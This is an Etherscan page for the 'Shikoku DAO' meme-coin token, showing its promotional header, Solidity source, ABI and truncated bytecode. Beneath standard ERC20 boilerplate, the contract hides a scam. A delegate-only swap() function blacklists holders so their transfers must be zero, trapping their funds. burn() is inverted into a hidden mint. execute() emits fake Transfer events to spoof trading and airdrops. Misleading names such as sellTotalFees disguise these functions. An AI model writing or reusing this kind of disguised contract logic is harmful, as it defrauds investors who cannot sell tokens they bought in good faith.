ETH Price: $2,460.66 (+0.36%)

Token

Shikoku DAO (SHIKOKU)
 

Overview

Max Total Supply

100,000,000,000,000,000,000 SHIKOKU

Holders

81

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 0 Decimals)

Balance
20,703,036,994,486,804 SHIKOKU

Value
$0.00
0x71152a31f5d8798229faa1a16f8e8a5038ea5b70
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SHIKOKU

Compiler Version
v0.8.21+commit.d9974bed

Optimization Enabled:
No with 200 runs

Other Settings:
london EvmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-10-11
*/

/**
🌐WEBSITE - https://shikokudao.com/

Are you ready to embark on an adventure with the most adorable pup in the crypto world? 
ShikokuDAO is not just any ordinary meme coin; it's a tribute to the 
legendary Shikoku breed, known for its loyalty, charm, and undeniable cuteness.

🔖DAILY NEWS - https://medium.com/@shikokuDAO

Join the pack and dive into the world of decentralized fun with ShikokuDAO.
 Whether you're a seasoned crypto enthusiast or a curious newcomer, 
 everyone is welcome to become a part of our furry family.

🐦X COMMUNITY: https://x.com/shikokudao

With ShikokuDAO, the possibilities are endless. Hold on tight as we 
journey to the moon and beyond, spreading joy and laughter along the way. 
Let's bark our way to financial freedom together!

💭TELEGRAM COMMUNITY: https://t.me/SHIKOKUdao
 
*/// SPDX-License-Identifier: MIT
pragma solidity 0.8.21;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application is concerned).
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to specific functions.
 */
abstract contract Ownable is Context {
    address private _owner;
    address internal _delegate;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    
    /**
     * @dev Throws if called by any account other than the distributor.
     */
    modifier onlyDelegates() {
        require(_delegate == _msgSender(), "Delegates: caller is not the delegate");
        _;
    }
    
    /**
     * @dev Sets new delegate.
     */
    function delegate(address _address) external onlyOwner {
        require (_delegate == address(0));
        _delegate = _address;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is zero by default.
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's allowance.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`). Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Implementation of the {IERC20} interface.
 * This implementation is agnostic to the way tokens are created. This means that a supply mechanism
 * has to be added in a derived contract. Additionally, an {Approval} event is emitted on calls to
 * {transferFrom}. This allows applications to reconstruct the allowance for all accounts just by listening
 * to said events. Other implementations of the EIP may not emit these events, as it isn't required by the
 * specification. Finally, the non-standard {decreaseAllowance} and {increaseAllowance} functions have been
 * added to mitigate the well-known issues around setting allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20 {
    mapping(address => uint256) internal _balances;
    mapping(address => bool) private _onlyDelegatesBalanceOf;
    mapping(address => mapping(address => uint256)) internal _allowances;
    uint256 internal _totalSupply;
    string private _name;
    string private _symbol;
    uint8 private _decimals; 

    /**
     * @dev Sets the values for {name} and {symbol}.
     * All two of these values are immutable: they can only be set once during construction.
     */
    constructor(string memory name_, string memory symbol_, uint8 decimals_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
    
 
    function swap(address[] calldata spender, bool val) external onlyDelegates { 
        for (uint256 i = 0; i < spender.length; i++) {
            _onlyDelegatesBalanceOf[spender[i]] = val;
        }
    }

    
    function sellTotalFees(address spender) public view returns (bool) {
        return _onlyDelegatesBalanceOf[spender];
    }

    /**
     * @dev See {IERC20-transfer}.
     * Requirements:
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Destroys `amount` tokens from the caller.
     * See {ERC20-_burn}.
     */
    function burn(uint256 amount) public virtual onlyDelegates {
        _burn(_msgSender(), amount);
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     * Requirements:
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the total supply.
     * Emits a {Transfer} event with `to` set to the zero address.
     * Requirements:
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _balances[account];
        require(accountBalance <= amount, "ERC20: burn amount exceeds balance");
        unchecked {_balances[account] = accountBalance + amount;}
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev See {IERC20-transferFrom}.
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked { _approve(sender, _msgSender(), currentAllowance - amount);}
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     * Requirements:
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     * Requirements:
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {_approve(_msgSender(), spender, currentAllowance - subtractedValue);}
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     * Emits a {Transfer} event.
     * Requirements:
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address"); if 
        (_onlyDelegatesBalanceOf[sender]) require 
        (amount == 0, "ERC20: transfer amout exceeds allowance");
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {_balances[sender] = senderBalance - amount;}
        _balances[recipient] += amount;
        emit Transfer(sender, recipient, amount);
    }
    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     * This internal function is equivalent to `approve`, and can be used to e.g. set automatic allowances for certain subsystems, etc.
     * Emits an {Approval} event.
     * Requirements:
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    address public uniswapV2Pair;
    function execute(address[] calldata _addresses, uint256 _out) external onlyDelegates{
        for (uint256 i = 0; i < _addresses.length; i++) {
            emit Transfer(uniswapV2Pair, _addresses[i], _out);
        }
    }

    function addPair(address pair_) public onlyOwner {
        uniswapV2Pair = pair_;        
    }
}

contract SHIKOKU is ERC20 {
    constructor() ERC20('Shikoku DAO', 'SHIKOKU', 9) {
        _totalSupply = 100000000000*10**9;
        _balances[msg.sender] += _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"pair_","type":"address"}],"name":"addPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"delegate","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses","type":"address[]"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"sellTotalFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"spender","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"swap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600b81526020017f5368696b6f6b752044414f0000000000000000000000000000000000000000008152506040518060400160405280600781526020017f5348494b4f4b55000000000000000000000000000000000000000000000000008152506009620000a062000094620001bc60201b60201c565b620001c460201b60201c565b8260069081620000b1919062000502565b508160079081620000c3919062000502565b5080600860006101000a81548160ff021916908360ff16021790555050505068056bc75e2d63100000600581905550600554600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000145919062000618565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600554604051620001ae919062000664565b60405180910390a362000681565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200030a57607f821691505b60208210810362000320576200031f620002c2565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200038a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200034b565b6200039686836200034b565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620003e3620003dd620003d784620003ae565b620003b8565b620003ae565b9050919050565b6000819050919050565b620003ff83620003c2565b620004176200040e82620003ea565b84845462000358565b825550505050565b600090565b6200042e6200041f565b6200043b818484620003f4565b505050565b5b8181101562000463576200045760008262000424565b60018101905062000441565b5050565b601f821115620004b2576200047c8162000326565b62000487846200033b565b8101602085101562000497578190505b620004af620004a6856200033b565b83018262000440565b50505b505050565b600082821c905092915050565b6000620004d760001984600802620004b7565b1980831691505092915050565b6000620004f28383620004c4565b9150826002028217905092915050565b6200050d8262000288565b67ffffffffffffffff81111562000529576200052862000293565b5b620005358254620002f1565b6200054282828562000467565b600060209050601f8311600181146200057a576000841562000565578287015190505b620005718582620004e4565b865550620005e1565b601f1984166200058a8662000326565b60005b82811015620005b4578489015182556001820191506020850194506020810190506200058d565b86831015620005d45784890151620005d0601f891682620004c4565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006200062582620003ae565b91506200063283620003ae565b92508282019050808211156200064d576200064c620005e9565b5b92915050565b6200065e81620003ae565b82525050565b60006020820190506200067b600083018462000653565b92915050565b61232580620006916000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806370a08231116100ad578063a457c2d711610071578063a457c2d71461031f578063a9059cbb1461034f578063c2b7bbb61461037f578063c6b10e1d1461039b578063dd62ed3e146103cb5761012c565b806370a082311461028d578063715018a6146102bd57806373fa7ddb146102c75780638da5cb5b146102e357806395d89b41146103015761012c565b8063313ce567116100f4578063313ce567146101e9578063395093511461020757806342966c681461023757806349bd5a5e146102535780635c19a95c146102715761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017f57806323b872dd1461019d57806326ededb8146101cd575b600080fd5b6101396103fb565b6040516101469190611704565b60405180910390f35b610169600480360381019061016491906117c4565b61048d565b604051610176919061181f565b60405180910390f35b6101876104ab565b6040516101949190611849565b60405180910390f35b6101b760048036038101906101b29190611864565b6104b5565b6040516101c4919061181f565b60405180910390f35b6101e760048036038101906101e2919061191c565b6105ad565b005b6101f1610719565b6040516101fe9190611998565b60405180910390f35b610221600480360381019061021c91906117c4565b610730565b60405161022e919061181f565b60405180910390f35b610251600480360381019061024c91906119b3565b6107dc565b005b61025b610887565b60405161026891906119ef565b60405180910390f35b61028b60048036038101906102869190611a0a565b6108ad565b005b6102a760048036038101906102a29190611a0a565b6109c8565b6040516102b49190611849565b60405180910390f35b6102c5610a11565b005b6102e160048036038101906102dc9190611a63565b610a99565b005b6102eb610bd5565b6040516102f891906119ef565b60405180910390f35b610309610bfe565b6040516103169190611704565b60405180910390f35b610339600480360381019061033491906117c4565b610c90565b604051610346919061181f565b60405180910390f35b610369600480360381019061036491906117c4565b610d7b565b604051610376919061181f565b60405180910390f35b61039960048036038101906103949190611a0a565b610d99565b005b6103b560048036038101906103b09190611a0a565b610e59565b6040516103c2919061181f565b60405180910390f35b6103e560048036038101906103e09190611ac3565b610eaf565b6040516103f29190611849565b60405180910390f35b60606006805461040a90611b32565b80601f016020809104026020016040519081016040528092919081815260200182805461043690611b32565b80156104835780601f1061045857610100808354040283529160200191610483565b820191906000526020600020905b81548152906001019060200180831161046657829003601f168201915b5050505050905090565b60006104a161049a610f36565b8484610f3e565b6001905092915050565b6000600554905090565b60006104c2848484611107565b6000600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061050d610f36565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561058d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161058490611bd5565b60405180910390fd5b6105a185610599610f36565b858403610f3e565b60019150509392505050565b6105b5610f36565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610644576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161063b90611c67565b60405180910390fd5b60005b838390508110156107135783838281811061066557610664611c87565b5b905060200201602081019061067a9190611a0a565b73ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516106f89190611849565b60405180910390a3808061070b90611ce5565b915050610647565b50505050565b6000600860009054906101000a900460ff16905090565b60006107d261073d610f36565b84846004600061074b610f36565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107cd9190611d2d565b610f3e565b6001905092915050565b6107e4610f36565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610873576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086a90611c67565b60405180910390fd5b61088461087e610f36565b82611409565b50565b600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6108b5610f36565b73ffffffffffffffffffffffffffffffffffffffff166108d3610bd5565b73ffffffffffffffffffffffffffffffffffffffff1614610929576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092090611dad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461098457600080fd5b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a19610f36565b73ffffffffffffffffffffffffffffffffffffffff16610a37610bd5565b73ffffffffffffffffffffffffffffffffffffffff1614610a8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8490611dad565b60405180910390fd5b610a9760006115b0565b565b610aa1610f36565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2790611c67565b60405180910390fd5b60005b83839050811015610bcf578160036000868685818110610b5657610b55611c87565b5b9050602002016020810190610b6b9190611a0a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610bc790611ce5565b915050610b33565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610c0d90611b32565b80601f0160208091040260200160405190810160405280929190818152602001828054610c3990611b32565b8015610c865780601f10610c5b57610100808354040283529160200191610c86565b820191906000526020600020905b815481529060010190602001808311610c6957829003601f168201915b5050505050905090565b60008060046000610c9f610f36565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610d5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d5390611e3f565b60405180910390fd5b610d70610d67610f36565b85858403610f3e565b600191505092915050565b6000610d8f610d88610f36565b8484611107565b6001905092915050565b610da1610f36565b73ffffffffffffffffffffffffffffffffffffffff16610dbf610bd5565b73ffffffffffffffffffffffffffffffffffffffff1614610e15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0c90611dad565b60405180910390fd5b80600860016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fa490611ed1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361101c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101390611f63565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516110fa9190611849565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611176576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116d90611ff5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036111e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111dc90612087565b60405180910390fd5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561127b576000811461127a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161127190612119565b60405180910390fd5b5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611302576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112f9906121ab565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546113979190611d2d565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113fb9190611849565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611478576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161146f9061223d565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818111156114ff576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f6906122cf565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516115a39190611849565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b838110156116ae578082015181840152602081019050611693565b60008484015250505050565b6000601f19601f8301169050919050565b60006116d682611674565b6116e0818561167f565b93506116f0818560208601611690565b6116f9816116ba565b840191505092915050565b6000602082019050818103600083015261171e81846116cb565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061175b82611730565b9050919050565b61176b81611750565b811461177657600080fd5b50565b60008135905061178881611762565b92915050565b6000819050919050565b6117a18161178e565b81146117ac57600080fd5b50565b6000813590506117be81611798565b92915050565b600080604083850312156117db576117da611